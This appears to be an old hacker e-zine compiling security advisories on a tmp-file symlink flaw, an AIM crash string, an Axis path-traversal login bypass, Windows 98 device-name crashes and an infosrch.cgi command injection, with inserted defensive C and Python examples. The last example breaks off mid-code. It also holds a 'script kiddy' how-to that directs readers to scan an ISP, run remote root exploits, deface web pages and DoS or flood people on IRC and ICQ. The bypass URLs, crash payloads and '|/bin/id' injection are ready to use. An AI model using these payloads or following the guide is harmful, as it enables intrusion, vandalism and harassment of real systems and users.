155.0 FLYING: Xwindows game leaves files readable in system
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://packetstorm.securify.com/
      March Archive
      
            
      Vulnerability: Any user can read any file in the system.
      title=Flying rev. 6.20
      author=Helmut Hoenig
      system=tested on Redhat 5.2, possibly others
      foundby=grandpae@nconnect.net (Grampa Elite)
      
      Overview: Flying is an X-Windows program I have found installed on Redhat 
      5.2 that is actually a gateway for multiple games that Helmut wrote.  All of
      these games unfortunately write to /tmp/logfile.txt.  Basically all that you
      have to do is symlink logfile.txt to say /var/log/messages, and as soon as
      root runs his silly little game it overwrites logfile.txt with the file you
      symlinked it to, also it becomes owned by root and the symlink is turned
      off.  The big but is that the read bit is left on allowing you to read the
      tmp file.  Do I have anything better to do than find stupid tmp file holes
      in mostly unused games?  No not really.
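
      The flaw class reported above is a fixed file name in a world-writable
      directory, opened in a way that follows a symlink someone else planted.
      The following is an added example, not code from Flying or from the
      advisory's author; the function names and the scratch paths are
      assumptions made for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a fixed name, opened so that an
 * existing symlink is followed and its target truncated. */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened open for a fixed name: O_EXCL fails if anything (file or symlink,
 * even a dangling one) already has that name, O_NOFOLLOW refuses a symlink as
 * the last path component, and 0600 keeps other users from reading the log. */
int open_log_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred: let mkstemp() pick an unpredictable name (created 0600, O_EXCL).
 * tmpl must end in "XXXXXX" and is rewritten with the name actually used. */
int open_log_private(char *tmpl)
{
    return mkstemp(tmpl);
}

static int write_file(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(text, f);
    return fclose(f);
}

static long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1L;
}

/* Constructed scenario inside a private scratch directory: a symlink named
 * logfile.txt points at a "victim" file, then each open routine is tried.
 * Returns a bit mask: 1 = the unsafe open emptied the victim,
 *                     2 = the safe open refused and the victim is intact,
 *                     4 = mkstemp gave a fresh file with mode 0600. */
int symlink_demo(void)
{
    const char *base = getenv("TMPDIR");
    char dir[200], victim[256], logp[256], priv[256];
    struct stat st;
    int fd, result = 0;

    if (!base || !*base) base = "/tmp";
    snprintf(dir, sizeof dir, "%s/flydemoXXXXXX", base);
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(logp, sizeof logp, "%s/logfile.txt", dir);
    snprintf(priv, sizeof priv, "%s/logXXXXXX", dir);

    if (write_file(victim, "secret\n") != 0 || symlink(victim, logp) != 0)
        return -1;

    fd = open_log_unsafe(logp);            /* follows the link to the victim */
    if (fd >= 0) close(fd);
    if (file_size(victim) == 0) result |= 1;

    write_file(victim, "secret\n");        /* restore, then try the safe open */
    fd = open_log_safe(logp);
    if (fd < 0 && file_size(victim) == 7) result |= 2;
    if (fd >= 0) close(fd);

    fd = open_log_private(priv);
    if (fd >= 0 && fstat(fd, &st) == 0 && (st.st_mode & 0777) == 0600)
        result |= 4;
    if (fd >= 0) { close(fd); unlink(priv); }

    unlink(logp);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("demo result mask: %d\n", symlink_demo());
    return 0;
}
```

      On Linux the fs.protected_symlinks sysctl adds a kernel-side check for
      sticky world-writable directories, but it does not replace opening the
      file safely in the program itself.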
      
      @HWA
      
156.0 AIM messenger DoS
      ~~~~~~~~~~~~~~~~~
      
      http://packetstorm.securify.com/
      March Archive
      
      
      
      As all Ascii-Symbols can be displayed in &#XXX; format, where XXX are
      numbers from 0-255, AIM seems not to check the XXX for higher values
      and some strings above 255 result in aim crashing completely or in part.
      
      E.g. the string &#770; will result in crashing the whole aim, but &#771;
      will crash only the instant message window (&#771; was only tested once
      by me).
      It will crash the AIM of the attacker too, because AIM displays the string
      in the attacker-Instant Message, so the attacker-AIM also tries to convert
      it and errors.
      
      There is already an unofficial fix available, which can be downloaded at my
      homepage: http://laugh.at/cruz
      The fix is an edited ate32.dll, which should be copied to the aim directory.
      With it, aim doesn't try to convert "&#XXX;"-type of strings anymore, a
      minimum drawback (note: with that fix, the attacker can use this exploit to
      crash other unfixed AIMs, but won't crash his/her own AIM).
      
      Affected versions: I tested this only on 3.5+ versions of AIM, but all other
      versions are most likely affected too.
      
      -cruz
      http://laugh.at/cruz
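
      The report above says the client does not check the number inside an
      &#XXX; string against the 0-255 range. The following is an added example
      of a decoder that performs that check; it is not AIM's code or the
      author's fix, and the function names are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_REF_DIGITS 3            /* "255" is the longest valid value */

/* Try to parse one "&#DDD;" reference at s. Returns the number of input
 * characters it occupies and stores its value, or 0 if s is not a
 * well-formed reference in the range 1..255. Value 0 is rejected as well
 * (a choice of this example): a NUL byte would truncate the C string. */
static size_t parse_ref(const char *s, unsigned *value)
{
    size_t i = 2, digits = 0;
    unsigned v = 0;

    if (s[0] != '&' || s[1] != '#') return 0;
    while (isdigit((unsigned char)s[i])) {
        if (++digits > MAX_REF_DIGITS) return 0;  /* bounded: v cannot overflow */
        v = v * 10 + (unsigned)(s[i] - '0');
        i++;
    }
    if (digits == 0 || s[i] != ';') return 0;
    if (v < 1 || v > 255) return 0;               /* the range check */
    *value = v;
    return i + 1;
}

/* Decode every valid reference in `in` into `out`. A reference that fails
 * validation is copied through as literal text and counted in *rejected.
 * Returns the output length, or -1 if `out` is too small. */
int decode_refs(const char *in, char *out, size_t outlen, int *rejected)
{
    size_t o = 0;

    *rejected = 0;
    if (outlen == 0) return -1;
    while (*in) {
        unsigned v;
        size_t n = parse_ref(in, &v);

        if (o + 1 >= outlen) return -1;           /* keep room for the NUL */
        if (n) {
            out[o++] = (char)v;
            in += n;
        } else {
            if (in[0] == '&' && in[1] == '#' && isdigit((unsigned char)in[2]))
                (*rejected)++;
            out[o++] = *in++;
        }
    }
    out[o] = '\0';
    return (int)o;
}

int main(void)
{
    /* Constructed sample message containing one valid and one invalid reference. */
    const char *msg = "&#72;i there &#770; bye";
    char buf[64];
    int rejected;
    int n = decode_refs(msg, buf, sizeof buf, &rejected);

    printf("%d bytes, %d rejected: %s\n", n, rejected, buf);
    return 0;
}
```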
      
      @HWA
      
157.0 Bypassing authentication on Axis StorPoint CD;
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      http://packetstorm.securify.com/
      March Archive
      

      From: "Vitek, Ian" <ian.vitek@INFOSEC.SE>
      Subject:      Infosec.20000229.axisstorpointcd.a
      X-To:         bugtraq@securityfocus.com
      To: BUGTRAQ@SECURITYFOCUS.COM
      
      Infosec Security Vulnerability Report
      No: Infosec.20000229.axisstorpointcd.a
      ======================================
      
      Vulnerability Summary
      ---------------------
      
      Problem: Bypassing authentication on Axis StorPoint CD;
                     By modifying an URL, outsiders can access
                     administrator URLs without entering username
                     and password
      
      Threat: Unauthorized access
      
      Platform: Axis StorPoint CD
                Axis StorPoint CD/T
                     (Software Version 4.13)
      
      Solution: Upgrade to Software Version 4.28
      
      
      Vulnerability Description
      -------------------------
      CDs are available from the URL http://server/cd/
      The configuration URL is:
      http://server/config/html/cnf_gi.htm
      This page is protected by a login and could contain very sensitive information.
      The login could be bypassed by the URL:
      http://server/cd/../config/html/cnf_gi.htm
      
      The server seems to check access permissions before URL conversion.
      
      Solution
      --------
      Infosec and Axis recommend that customers upgrade their StorPoint Software. The
      current version is 4.28 and is not vulnerable to this attack.
      http://www.se.axis.com/techsup/cdsrv/storpoint_cd/index.html
      
      Additional Information
      ----------------------
      The Axis StorPoint CD and StorPoint CD/T with Software Version 4.13 are old
      products with old software (from 1997). As Axis says:
      "Note that the development for StorPoint CD and CD/T has been discontinued from
      November 1999, only minor service releases will be available."
      Axis has tested their new products, Axis StorPoint CD E100 and StorPoint NAS
      100, and this vulnerability has not been found.
      
      Recognition
      -----------
      Infosec would like to thank Peter Berggren and Johan Diedrichs at Axis for their
      involvement with testing and supplying patch information.
      
      //Ian Vitek
      ian.vitek@infosec.se
      
      -------------------------------
      Infosec is a Swedish based tigerteam that has worked with computer-related
      security since 1982 and done penetration tests and technical revisions since
      1996. Infosec is now searching for co-workers. Call Blume on +46-8-6621070 for
      more information.
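
      The advisory above infers that the server checks access permissions
      before it converts the URL. The following is an added example of that
      ordering next to the corrected one; it is not Axis code, and the
      function names and the rule that /config needs a login are assumptions
      taken from the URLs quoted in the report.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumption of this example: everything under /config needs a login. */
static int needs_login(const char *path)
{
    return strcmp(path, "/config") == 0 || strncmp(path, "/config/", 8) == 0;
}

/* Resolve "." and ".." segments and collapse repeated slashes.
 * Returns 0 on success, -1 if the path is not absolute, climbs above the
 * root, or does not fit in `out`. */
int normalize_path(const char *in, char *out, size_t outlen)
{
    size_t o = 0;

    if (in[0] != '/' || outlen < 2) return -1;
    while (*in) {
        size_t seg;

        while (*in == '/') in++;                  /* skip separators */
        seg = strcspn(in, "/");
        if (seg == 0) break;                      /* trailing slash */
        if (seg == 1 && in[0] == '.') {
            /* current directory: nothing to add */
        } else if (seg == 2 && in[0] == '.' && in[1] == '.') {
            if (o == 0) return -1;                /* would leave the root */
            while (o > 0 && out[--o] != '/')      /* pop the last segment */
                ;
        } else {
            if (o + 1 + seg + 1 > outlen) return -1;
            out[o++] = '/';
            memcpy(out + o, in, seg);
            o += seg;
        }
        in += seg;
    }
    if (o == 0) out[o++] = '/';
    out[o] = '\0';
    return 0;
}

/* The ordering the advisory infers: the decision is taken on the raw
 * request path, and only afterwards is the path converted. `served`
 * receives the path that would actually be opened. Returns 1 if served. */
int serve_check_then_convert(const char *raw, int logged_in,
                             char *served, size_t n)
{
    if (needs_login(raw) && !logged_in) return 0;
    return normalize_path(raw, served, n) == 0;
}

/* Corrected ordering: convert first, then decide on the converted path. */
int serve_convert_then_check(const char *raw, int logged_in,
                             char *served, size_t n)
{
    if (normalize_path(raw, served, n) != 0) return 0;
    return logged_in || !needs_login(served);
}

int main(void)
{
    const char *req = "/cd/../config/html/cnf_gi.htm"; /* path from the advisory */
    char served[128];

    printf("check-then-convert, no login: %d\n",
           serve_check_then_convert(req, 0, served, sizeof served));
    printf("convert-then-check, no login: %d\n",
           serve_convert_then_check(req, 0, served, sizeof served));
    return 0;
}
```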
      
      
      @HWA      
      
      
158.0 Securax advisory, various BSOD (Windows) problems.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://packetstorm.securify.com/
      March Archive
      

      =====================================================================
      Securax-SA-01                                       Security Advisory
      belgian.networking.security                                     Dutch
      =====================================================================
      Topic:          Ms Windows '95/'98/SE will crash upon parsing specially
                      crafted path-strings referring to device drivers.
      
      Announced:      2000-03-04
      Updated:        2000-03-05
      Affects:        Ms Windows'95, Ms Windows '98, Ms Windows '98 SE
      None affected:  Ms Windows NT Server/Workstation 4.0 (sp5/6)
      Obsoletes:      crash-ie.txt, win98-con.txt
      =====================================================================
      
      
               THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR 
        RESULTS.  THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 
        100% CORRECT.  THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR
        NOTICE.
      
               PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING 
        THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUGTRAQ.
        THANK YOU,
      
      
      
      
      I.   Background
      
       Local and Remote users can crash Windows '98 systems using specially 
       crafted path-strings that refer to device drivers being used.  
       Upon parsing this path the Ms Windows OS will crash leaving no 
       other option but to reboot the machine. With this all other running
       applications on the machine will stop responding.
      
       NOTE: This is not a bug in Internet Explorer, FTPd and other
       webserver software running Win95/98.  It is a bug in the Ms
       Windows kernel system, more specifically in the handling of the device
       drivers specified in IO.SYS, causing this kernel meltdown.
      
      
      
      II.  Problem Description
      
       When the Microsoft Windows operating system is parsing a path that 
       is being crafted like "c:\[device]\[device]" it will halt, and crash 
       the entire operating system.  
      
       Four device drivers have been found to crash the system.  The CON,
       NUL, AUX, CLOCK$ and CONFIG$ are the two device drivers which are 
       known to crash.  Other devices as LPT[x]:, COM[x]: and PRN have not 
       been found to crash the system.  
      
       Making combinations as CON\NUL, NUL\CON, AUX\NUL, ... seems to 
       crash Ms Windows as well.
      
       Calling a path such as "C:\CON\[filename]" won't result in a crash
       but in an error-message.  Creating the map "CON", "CLOCK$", "AUX"
       "NUL" or "CONFIG$" will also result in a simple error-message 
       saying: ''creating that map isn't allowed''.
       
      
       DEVICE DRIVERS
       --------------
       These are specified in IO.SYS and date back from the early Ms Dos
       days.  Here is what I have found.  Here is a brief list;
      
        CLOCK$       - System clock
        CON          - Console; combination of keyboard and screen to 
                       handle input and output
        AUX or COM1  - First serial communication port
        COMn         - Second, Third, ... communication port
        LPT1 or PRN  - First parallel port
        NUL          - Dummy port, or the "null device" which we all
                       know under Linux as /dev/null.
        CONFIG$      - Unknown
      
      
      
       Any call made to a path consisting of "NUL" and "CON" seems to
       crash routines made to the FAT32/VFAT, eventually trashing the 
       kernel.
      
       Therefore, it is possible to crash -any- other local and/or
       remote application as long as they parse the path-strings to
       call FAT32/VFAT routines in the kernel.  Mind you, we are -not- 
       sure this is the real reason, however there is strong evidence 
       to assume this is the case.
      
       So... To put it in layman's terms...  It seems that the Windows98
       kernel is going berserk upon processing paths that are made up
       of "old" (read: Ms Dos) device drivers.
      
      
      
      III.  Reproduction of the problem
      
        (1) When receiving images into HTML with a path referring to 
        [drive]:\con\con or [drive]:\nul\nul.  This will crash the Ms
        Windows '98 Operating System when viewing this HTML.  This has
        been tested on Microsoft Outlook and Eudora Pro 4.2. Netscape
        Messenger seems not to crash.
      
             <HTML>
               <BODY>
                 <A HREF="c:\con\con">crashing IE</A>
                 <!-- or nul\nul, clock$\clock$ -->
                 <!-- or aux\aux, config$\config$ -->
               </BODY>
             </HTML>
      
        (2) When using GET /con/con or GET /nul/nul using WarFTPd on 
        any directory will also crash the operating system.  Other 
        FTPdaemons have not been tested.  So it's possible to remotely 
        crash Ms Windows '98 Operating Systems.  We expect that virtually 
        every FTPd running Windows '95/'98(se) can be crashed.
      
        (3) Inserting HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\_
        open with the value of c:\con\con "%1" %* or c:\nul\nul "%1" %* 
        will also crash the system.  Think of what Macro virii can do
        to your system now.
      
        (4) It's possible to crash any Windows '95/'98(SE) machine 
        running webserver software as Frontpage Webserver, ...  You can
        crash the machine by feeding an URL as 
      
            http://www.a_win98_site.be/nul/nul
      
        (5) Creating a HTML page with IMG tags or HREF tags referring to 
        the local "nul" path or the "con" path.
      
             <HTML>
               <BODY>
                 <IMG SRC="c:\con\con">
                 <!-- or nul\nul, clock$\clock$ -->
                 <!-- or aux\aux, config$\config$ -->
               </BODY>
             </HTML>
      
      
      
       There are many more methods in crashing the Ms Windows Operating 
       System but the essential part seems to be calling a path and file 
       both referring to a device name, either NUL, CON, AUX, CLOCK$ or
       CONFIG$, with the objective of getting data on the screen using 
       this path.  As you may notice, crashing the system can be done 
       remote or local.
      
      
       NETSCAPE - Netscape doesn't crash at first, because the string to
       call a path is changed to file:///D|/c:\nul\nul.  Upon entering
       c:\nul\nul in the URL without file:///D|/ you -do- crash Netscape
       and the Operating System.
       
      
      
      III. Impact
      
       This type of attack will render all applications useless, thus 
       leaving the system administrator no other option than rebooting the 
       system. Due to the wide range of options how to crash the Ms Windows 
       operating system, this is a severe bug.  However, Windows NT 
       systems don't seem to be vulnerable.
      
      
      
      IV.  Solution
       
       Ms Windows NT 4.0 and 2000 aren't affected as well.  We advise 
       Windows'98 users to either upgrade to the systems specified as 
       above, or not to follow html-links that refer to the device
       drivers specified as above.  Microsoft has been notified.  No
       official patch has been announced ( 2000-03-05 ).
      
       WORKAROUND: A simple byte hack could prevent this from happening
       as long as you don't use older Ms Dos programs making legitimate
       use of the device drivers.  By replacing all "NUL", "AUX", "CON"
       "CLOCK$" and "CONFIG$" device driver strings with random values
       or hex null values.  Mind you, upon hexediting these values, you
       must be aware that your system may become unstable.  We have
       created a patch that alters the strings, after the patch we were
       no longer able to type in any commands on the Ms-Dos prompt.  The
       problem, however, was resolved.  Because of this side-effect, we
       are -not- releasing the patch.  It's up to you to decide if you
       want to change the bytes or not ( even with Ms Edit in binary 
       mode you can quickly patch your IO.SYS ).
      
      
      
      V.   Credits
      
       Initial "con" bug found in Internet Explorer by Suigien -*- Remote 
       Crashing using FTPd, HTTPd, EMail, Usenet by Zoa_Chien Path0s, 
       Necrite, Elias and ToSH -*- Byte hack IO.SYS workaround by Zoa_Chien
       -*- Advisory, IO.SYS exe/testing and aux/nul/clock$/config$ 
       detection by vorlon.
      
      
      
      
      
      =====================================================================
      For more information                                 info@securax.org
      Website                                        http://www.securax.org
      Advisories/Text                           http://www.securax.org/pers
      ---------------------------------------------------------------------
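
      A server that maps request paths onto a Windows '95/'98 file system can
      refuse paths containing the device names listed in the advisory before
      they reach the operating system. The following is an added example of
      such a filter, not part of the Securax advisory; the function names are
      assumptions, and matching a device name that carries an extension
      (CON.txt) goes beyond the cases the advisory tested.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Device names from the advisory's list; COMn and LPTn are handled below. */
static const char *const DEVICES[] = {
    "CON", "NUL", "AUX", "PRN", "CLOCK$", "CONFIG$"
};

/* Case-insensitive compare of a[0..alen) with the upper-case string b. */
static int eq_nocase(const char *a, size_t alen, const char *b)
{
    size_t i;

    if (alen != strlen(b)) return 0;
    for (i = 0; i < alen; i++)
        if (toupper((unsigned char)a[i]) != b[i]) return 0;
    return 1;
}

/* Is one path component a reserved device name? The base name is taken up
 * to the first '.' or ':' so that "con.txt" and "COM1:" are caught too. */
int is_device_name(const char *comp, size_t len)
{
    size_t i, base = 0;

    while (base < len && comp[base] != '.' && comp[base] != ':') base++;
    for (i = 0; i < sizeof DEVICES / sizeof DEVICES[0]; i++)
        if (eq_nocase(comp, base, DEVICES[i])) return 1;
    if (base == 4 && comp[3] >= '1' && comp[3] <= '9' &&
        (eq_nocase(comp, 3, "COM") || eq_nocase(comp, 3, "LPT")))
        return 1;
    return 0;
}

/* Count the components of a path that name a device. Both '/' (URL, FTP)
 * and '\' (local path) are treated as separators. */
int count_device_components(const char *path)
{
    int hits = 0;

    while (*path) {
        size_t len = strcspn(path, "/\\");

        if (len > 0 && is_device_name(path, len)) hits++;
        path += len;
        if (*path) path++;                        /* step over the separator */
    }
    return hits;
}

/* Policy of this example: refuse any path with a device component, not only
 * the [device]\[device] form, since there is no reason to serve either. */
int request_allowed(const char *path)
{
    return count_device_components(path) == 0;
}

int main(void)
{
    /* Constructed sample request paths. */
    const char *samples[] = {
        "/nul/nul", "c:\\con\\con", "/pub/con.txt", "/docs/console/index.html"
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-28s %s\n", samples[i],
               request_allowed(samples[i]) ? "allow" : "refuse");
    return 0;
}
```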
      
      @HWA              
      
      
      
159.0 How to be a Script Kiddy by DrHamstuh
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: DrHamstuh's HOW-TO for Linux
      
      Q:"How Do I Become A Hacker?"
      A: learn to code , install SunOS , get a SPARC , devote the rest of your
      life to computers and technology
      
      Q: well fuck that I'm lazy , how do i become a script kiddy?
      A: hmm I guess i can show you , whatever you do with this Info is your
      fault not mine...
      
      
      First things first , I am taking it you have Linux installed and a
      connection to the net.  If you are still on Windows* [TM] (C) (R)
      then please look into getting a linux CD-ROM from www.cheapbytes.com
      install linux , setup PPP [if in redhat just startx and use netcfg pussy]
      and come back and read this again ... thanx
      
      -=-=-=-=- t0p s3kr3t 0nly l1nux k1ddyZ c4n r3ad bel0w th1z l1n3 -=-=-=-=-
      /* top secret hamstuh encryption */
      JLKADJFLK;ASDFJLKSA;DJFLASK;DFJSLAKFJLAKSDFJLASKFJDLSKDJF
      
      * tools *
      mountd remote exploit code
      named remote exploit code
      imap remote exploit codes 
      wu-ftpd remote exploit code
      Security Scanner. SSCAN by JSBACH
      listen remote exploit code
      q-pop remote exploit code
      ICQ bomber & flooder source code
      Denial Of Service code
      BitchX 
      BitchX War Scripts
      * tools EOF *
      
      
      * general idea *
      Cause as much trouble with the tools you have as possible
      figure out what each tool does and how / why it works
      overall have fun with people and consider yourself better
      than them because you can use teardrop.c to freeze their windows 
      computer or ADMmountd.c to break into their elite red hat 5.1 box
      
      * getting started *
      to get started first you have to be able to walk ,
      being able to walk is relative to this as being able to move around
      your operating system. if you are "hacking" from a linux box [ YAY ]
      then these commands will help you.
      
      mkdir = creates a dir
      mv = move , rename
      cp = copy
      rm = remove 
      id = shows you who you are
      w  = shows you who's logged in
      tail -f = lets you watch a file as text is added to it in real time 
      echo = add's text to a file 
      cd = changes your directory 
      
      those are some of the basic's now you should be able to get started.
      
      ===============================================================================
      
      HOT TIP: make a dir in your base directory called .anythingsecret
      the . makes it not able to be shown to a regular ls , kind of hides it.
      
      HOT TIP: put all your "hacking" files in that .anythingsecret DIR 
      keep everything clean and in order and it will be a ton easier to keep
      your thoughts 2gether and in the long run you may have more "r00t shellz" 
      
      -----------------------------------------------------------------------------
      "r00t shellz" : in my earlier days i was told by someone who had
      been  on the scene for a long time , longer than i had that "root shells"
      are pretty much what you judge your eliteness on. 
      ------------------------------------------------------------------------------
      
      There are NO rules to being a script kiddy ,
      and NO morals are enforced upon you ,
      your actions are your actions ,
      and what you see fit to do will always be looked at by others and judged.
      
      ------------------------------------------------------------------------------
      
      I want to..
      A] hack shit now.
      B] get on IRC and learn more before i continue my life as a script kiddy
      C] change my mind and go get a sparc and be a real haxor
      
      if you said A then you have the mentality it takes to be a true script
      kiddy and im not going to hold you back any longer .. lets get started on
      talking about how to break into those krad red hat systems...
      
      If you just want to hack ANY computer on any network
      then i suggest just letting your Security Scanner scan
      for a long time and then picking the computers out of your 
      scanners log file that look like you would be able to gain access to the
      easiest. [ mountd / named / imap ] 
      
      If you are using SSCAN (tm) JSBACH, and are ready to hack some shit NOW.
      then start SSCAN running on some small town ISP..
      
      ie:
      home@linux# ./sscan localisp.com/24 >> hot.list &
      
      
      once the scanning has completed then use your favorite word editor [PICO@#%]
      and read the file.. look for where SSCAN has told you that a server is
      mountd/imap/or named overflowable.. and then just try all the servers
      listed with the exploit that it is listed for... surely after a while one
      will work.. even the sun shines on a cluebie script kiddy's ass some day.
      
      [ gcc -o rotshb rotshb.c ]
      ./rotshb server.com 4 1
      
      [ gcc -o mountd ADMmountd.c ]
      ./mountd server.com
      
      [ gcc -o imapk1ller imapexploit.c ]
      ./imapk1ller host.com offset
      
      you will know when your exploit worked and when you have root ,
      and you will probably get a funny little feeling , kind of an excited
      feeling that will be your motivation to do this again.. 
      
      now once you have root you are ready for the beef of a script kiddys
      life....
      
      changing HTML.. a script kiddy changes HTML in many ways for many
      reasons.. the funnier hacks i have seen are hacks that are supposed to be
      serious in which script kiddys voice their opinions on various things ..
      from the soup at school not tasting good to the government just any
      opinion that they have in their little brains .. 
      
      [ find / -name index.html ]
      root@hackedbox# echo " i own you " >> /home/httpd/html/index.html
      
      now that you have defaced your first web page , get on IRC and brag about
      it , as a script kiddy its something that you HAVE to do.. 
      
      load up BitchX and your War Script [ Civic.bx ] and head on over to
      TeenChat on EFNET.. scroll the URL to the page you just "hacked" and if
      anyone says anything negative to you say " Shut Up Bitch I Own You "
      and nuke them with /teardrop or any other elite d.o.s alias your war
      script may have.. you are now on your way to being a super ereet script
      kiddy.. by now you have probably already caused a stir in the underground
      and JP from AntiOnline.com is going to interview you because you hacked
      the first jewish server that was ever ran off linux .. and now the pope
      thinks you are the anti-christ and has been talking about you as an evil
      haxer all week on the news.. JP sees a chance to exploit you and make
      money off your teen ignorance and does so in a graceful manner.
      
      now your ego is larger then your IQ ,
      you know how to root a server ,
      you know how to D.o.S anyone on IRC ,
      you are confident ,
      you are clueless ,
      you think you are a god ,
      you have younger want to be script kiddys worshiping you ,
      you are in the pinnacle of your script kiddy life ,
      
      now take your ICQ flooders / bombers and harass everyone on your ICQ list
      for no obvious reason..
      
      you are now a Script Kiddy .. enjoy your new life of stupidity...
      
      in about a year you will realize that being a script kiddy is nothing but
      a waste of time.. and sure you have learnt your way around linux like a
      small town with only one street to pick up hookers , but you still have a
      long way to go before you are corporate material.. and once you decide
      computers are your dream and thats what you want to do for the rest of
      your life you notice that you wasted the last year and a half  being a
      script kiddy .. inflating your teen ego .. hurting lil web servers for no
      reason other than the thrill of the hack.. heh
      
      
      ---- another useless rant by DrHamstuh
      --
      Unwritten man page:
      Understanding Linux thru better medication
      Maintained by Timothy Oleary
      
      @HWA      
      
160.0 nfoSrch.cgi vulnerable to remote command execution
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by: ethO
      
      xploit:
      
      The following URL will exploit this vulnerability:
      http://www.example.com/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
      
      And experiment with variations thereof...
      
      

      #
      # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
      #
      # See the Nessus Scripts License for details
      #
      
      if(description)
      {
       name["english"] = "infosrch.cgi";
       name["francais"] = "infosrch.cgi";
       script_name(english:name["english"], francais:name["francais"]);
       
       desc["english"] = "The 'infosrch.cgi' cgi is installed. This CGI has
      a well known security flaw that lets anyone execute arbitrary
      commands with the privileges of the http daemon (root or nobody).
      
      Solution : remove it from /cgi-bin.
      
      Risk factor : Serious";
      
      
       desc["francais"] = "Le cgi 'infosrch.cgi' est installé. Celui-ci possède
      un problème de sécurité bien connu qui permet à n'importe qui de faire
      executer des commandes arbitraires au daemon http, avec les privilèges
      de celui-ci (root ou nobody). 
      
      Solution : retirez-le de /cgi-bin.
      
      Facteur de risque : Sérieux";
      
      
       script_description(english:desc["english"], francais:desc["francais"]);
       
       summary["english"] = "Checks for the presence of /cgi-bin/infosrch.cgi";
       summary["francais"] = "Vérifie la présence de /cgi-bin/infosrch.cgi";
       
       script_summary(english:summary["english"], francais:summary["francais"]);
       
       script_category(ACT_ATTACK);
       
       
       script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
                      francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
       family["english"] = "CGI abuses";
       family["francais"] = "Abus de CGI";
       script_family(english:family["english"], francais:family["francais"]);
       script_dependencie("find_service.nes");
       script_require_ports("Services/www", 80);
       exit(0);
      }
      
      #
      # The script code starts here
      #
      
      if(is_cgi_installed("infosrch.cgi"))
      {
       port = get_kb_item("Services/www");
       if(!port)port = 80;
       {
        soc = open_sock_tcp(port);
        if(soc)
        {
      
         req = string("GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.0\r\n");
         agent = string("User-Agent: Nessus\r\n\r\n");
         data = req + agent;
         send(socket:soc, data:data);
         rep = recv(socket:soc, length:4096);
         if("uid=" >< rep)security_hole(port);
         close(soc);
        }
       }
      }
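
      Added example (not part of the contributed advisory or of the Nessus
      script): a Python log check that flags requests to infosrch.cgi whose
      fname parameter carries a pipe, as in the URL above. The log lines and
      the scan() and fully_unquote() helpers are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Common Log Format lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2000:10:00:01 +0000] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=ls.1 HTTP/1.0" 200 5120
192.0.2.44 - - [01/Mar/2000:10:02:17 +0000] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.0" 200 61
192.0.2.44 - - [01/Mar/2000:10:02:30 +0000] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=%7C/bin/id HTTP/1.0" 200 61
192.0.2.77 - - [01/Mar/2000:10:05:00 +0000] "GET /index.html?fname=a|b HTTP/1.0" 200 900
192.0.2.80 - - [01/Mar/2000:10:06:00 +0000] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=%257Cid HTTP/1.0" 404 0
"""

# client, timestamp, method, request URI and status of one CLF line
CLF = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def fully_unquote(value, max_rounds=5):
    """Undo repeated percent-encoding (%257C -> %7C -> |)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text):
    """Return one record per infosrch.cgi request whose fname holds a pipe."""
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        parts = urlsplit(m["uri"])
        script = posixpath.basename(fully_unquote(parts.path)).lower()
        if script != "infosrch.cgi":
            continue  # only the CGI named in the advisory is of interest
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("fname", []):
            fname = fully_unquote(raw)  # parse_qs already decoded one round
            if "|" in fname:
                hits.append({
                    "client": m["client"],
                    "when": m["when"],
                    "fname": fname,
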